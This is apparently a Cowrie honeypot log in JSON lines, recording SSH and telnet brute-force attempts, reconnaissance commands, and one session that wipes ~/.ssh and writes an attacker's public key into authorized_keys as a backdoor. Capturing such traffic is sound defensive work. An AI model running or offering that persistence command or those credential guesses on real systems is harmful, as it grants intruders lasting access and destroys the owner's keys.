{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:54:32.186352Z","src_ip":"82.67.125.95","session":"567f215dbc56"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:54:32.348204Z","src_ip":"82.67.125.95","session":"567f215dbc56"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:32.379575Z","src_ip":"82.67.125.95","session":"567f215dbc56"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:32.380495Z","src_ip":"82.67.125.95","session":"111694261510"}
{"eventid":"cowrie.login.success","username":"root","password":"6ao3nb15","message":"login attempt [root/6ao3nb15] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:54:35.697364Z","src_ip":"212.227.125.160","session":"3a4a66c34390"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:54:37.627565Z","src_ip":"212.227.125.160","session":"3a4a66c34390"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T01:54:37.628264Z","src_ip":"212.227.125.160","session":"3a4a66c34390"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:38.547364Z","src_ip":"212.227.125.160","session":"3a4a66c34390"}
{"eventid":"cowrie.session.closed","duration":"13.0","message":"Connection lost after 13.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:38.548529Z","src_ip":"212.227.125.160","session":"3a4a66c34390"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58856,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac0736abcb1e","protocol":"ssh","message":"New connection: 212.227.125.160:58856 (1.2.3.4:22) [session: ac0736abcb1e]","sensor":"my-vps","timestamp":"2025-08-31T01:54:39.890013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:54:40.528631Z","src_ip":"212.227.125.160","session":"ac0736abcb1e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:54:40.529364Z","src_ip":"212.227.125.160","session":"ac0736abcb1e"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"123456789","message":"login attempt [dspace/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T01:54:42.741292Z","src_ip":"212.227.125.160","session":"ac0736abcb1e"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:44.121672Z","src_ip":"212.227.125.160","session":"ac0736abcb1e"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50622,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e820d9fefc1","protocol":"ssh","message":"New connection: 201.148.180.50:50622 (1.2.3.4:22) [session: 9e820d9fefc1]","sensor":"my-vps","timestamp":"2025-08-31T01:54:44.483770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:54:45.548389Z","src_ip":"201.148.180.50","session":"9e820d9fefc1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:54:45.549182Z","src_ip":"201.148.180.50","session":"9e820d9fefc1"}
{"eventid":"cowrie.login.success","username":"root","password":"6ao3nb15","message":"login attempt [root/6ao3nb15] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:54:50.577264Z","src_ip":"201.148.180.50","session":"9e820d9fefc1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:54:54.209078Z","src_ip":"201.148.180.50","session":"9e820d9fefc1"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-31T01:54:54.210079Z","src_ip":"201.148.180.50","session":"9e820d9fefc1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:55.695666Z","src_ip":"201.148.180.50","session":"9e820d9fefc1"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:55.696866Z","src_ip":"201.148.180.50","session":"9e820d9fefc1"}
{"eventid":"cowrie.session.connect","src_ip":"209.97.184.31","src_port":43524,"dst_ip":"1.2.3.4","dst_port":23,"session":"aeb4543f6ac2","protocol":"telnet","message":"New connection: 209.97.184.31:43524 (1.2.3.4:23) [session: aeb4543f6ac2]","sensor":"my-vps","timestamp":"2025-08-31T01:54:56.989584Z"}
{"eventid":"cowrie.session.closed","duration":1.126176357269287,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:58.115689Z","src_ip":"209.97.184.31","session":"aeb4543f6ac2"}
{"eventid":"cowrie.session.connect","src_ip":"209.97.184.31","src_port":43534,"dst_ip":"1.2.3.4","dst_port":23,"session":"7e6a0f8e7d6b","protocol":"telnet","message":"New connection: 209.97.184.31:43534 (1.2.3.4:23) [session: 7e6a0f8e7d6b]","sensor":"my-vps","timestamp":"2025-08-31T01:54:58.135475Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:54:58.218873Z","src_ip":"209.97.184.31","session":"7e6a0f8e7d6b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:54:58.241119Z","src_ip":"209.97.184.31","session":"7e6a0f8e7d6b"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T01:54:58.291736Z","src_ip":"209.97.184.31","session":"7e6a0f8e7d6b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:59.553827Z","src_ip":"209.97.184.31","session":"7e6a0f8e7d6b"}
{"eventid":"cowrie.session.closed","duration":1.4235813617706299,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:54:59.558981Z","src_ip":"209.97.184.31","session":"7e6a0f8e7d6b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64254,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0d77fe12460","protocol":"ssh","message":"New connection: 217.72.205.35:64254 (1.2.3.4:22) [session: c0d77fe12460]","sensor":"my-vps","timestamp":"2025-08-31T01:55:04.717916Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:04.719218Z","src_ip":"217.72.205.35","session":"c0d77fe12460"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:17.388291Z","src_ip":"115.190.94.119","session":"6dc0480fe57b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50478,"dst_ip":"1.2.3.4","dst_port":22,"session":"c58ad6865ea5","protocol":"ssh","message":"New connection: 212.227.235.229:50478 (1.2.3.4:22) [session: c58ad6865ea5]","sensor":"my-vps","timestamp":"2025-08-31T01:55:19.785811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:55:20.563156Z","src_ip":"212.227.235.229","session":"c58ad6865ea5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:55:20.564583Z","src_ip":"212.227.235.229","session":"c58ad6865ea5"}
{"eventid":"cowrie.login.failed","username":"dspace","password":"password","message":"login attempt [dspace/password] failed","sensor":"my-vps","timestamp":"2025-08-31T01:55:25.723829Z","src_ip":"212.227.235.229","session":"c58ad6865ea5"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:27.580084Z","src_ip":"212.227.235.229","session":"c58ad6865ea5"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":41086,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dba7907ad61","protocol":"ssh","message":"New connection: 82.67.125.95:41086 (1.2.3.4:22) [session: 7dba7907ad61]","sensor":"my-vps","timestamp":"2025-08-31T01:55:30.878919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:55:30.880023Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:55:30.915614Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.login.success","username":"root","password":"123580","message":"login attempt [root/123580] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.102439Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:55:31.193661Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.194340Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.195589Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.232445Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:55:31.379500Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.380556Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.419468Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.420341Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":41092,"dst_ip":"1.2.3.4","dst_port":22,"session":"40708df92864","protocol":"ssh","message":"New connection: 82.67.125.95:41092 (1.2.3.4:22) [session: 40708df92864]","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.454865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.455766Z","src_ip":"82.67.125.95","session":"40708df92864"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.491506Z","src_ip":"82.67.125.95","session":"40708df92864"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:55:31.678890Z","src_ip":"82.67.125.95","session":"40708df92864"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:32.718198Z","src_ip":"82.67.125.95","session":"40708df92864"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":41100,"dst_ip":"1.2.3.4","dst_port":22,"session":"59187df6ddef","protocol":"ssh","message":"New connection: 82.67.125.95:41100 (1.2.3.4:22) [session: 59187df6ddef]","sensor":"my-vps","timestamp":"2025-08-31T01:55:32.753030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:55:32.753963Z","src_ip":"82.67.125.95","session":"59187df6ddef"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:55:32.789881Z","src_ip":"82.67.125.95","session":"59187df6ddef"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:55:32.973873Z","src_ip":"82.67.125.95","session":"59187df6ddef"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:55:33.011321Z","src_ip":"82.67.125.95","session":"7dba7907ad61"}
